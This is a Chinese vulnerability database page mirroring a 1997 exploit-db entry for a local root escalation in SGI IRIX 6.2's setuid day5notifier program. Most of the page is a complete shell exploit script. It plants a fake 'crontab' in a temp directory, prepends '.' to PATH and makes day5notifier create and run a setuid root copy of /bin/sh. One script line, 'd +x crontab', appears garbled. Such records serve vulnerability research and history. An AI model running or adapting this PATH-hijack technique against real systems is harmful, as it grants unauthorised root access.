SGI IRIX 6.2 – ‘day5notifier’ Local Privilege Escalation

SGI IRIX 6.2 – ‘day5notifier’ Local Privilege Escalation

漏洞ID 1053348 漏洞类型
发布时间 1997-05-16 更新时间 1997-05-16
图片[1]-SGI IRIX 6.2 – ‘day5notifier’ Local Privilege Escalation-安全小百科CVE编号 N/A
图片[2]-SGI IRIX 6.2 – ‘day5notifier’ Local Privilege Escalation-安全小百科CNNVD-ID N/A
漏洞平台 IRIX CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/19273
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#!/bin/sh
#source: http://www.securityfocus.com/bid/345/info
#
#A vulnerability exists in the day5notifier program, shipped with Irix 6.2 from Silicon Graphics Inc. This program will allow any user to run any command as root.
#
#day5notifier wisely replaces a number of system() calls with execve() calls. However, the code was translated to run a copy of /bin/sh as the processor in the execve. As such, all the security problems associated with using a system() call in a setuid program remain.

#!/bin/sh
# reg4root - Register me for Root!
#
# Exploit a bug in SGI's Registration Software
#
# -Mike Neuman
# [email protected]
# 8/6/96

MYPWD=`pwd`
mkdir /tmp/emptydir.$$
cd /tmp/emptydir.$$

cat <<EOF >crontab
cp /bin/sh ./suidshell
chmod 4755 suidshell
EOF
d +x crontab

PATH=.:$PATH
export PATH

/var/www/htdocs/WhatsNew/CustReg/day5notifier -procs 0

./suidshell

cd $MYPWD
rm -rf /tmp/emptydir.$$

相关推荐: AIX lquerylv Buffer Overflow Vulnerability

AIX lquerylv Buffer Overflow Vulnerability 漏洞ID 1105095 漏洞类型 Boundary Condition Error 发布时间 1997-05-26 更新时间 1997-05-26 CVE编号 N/A CN…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享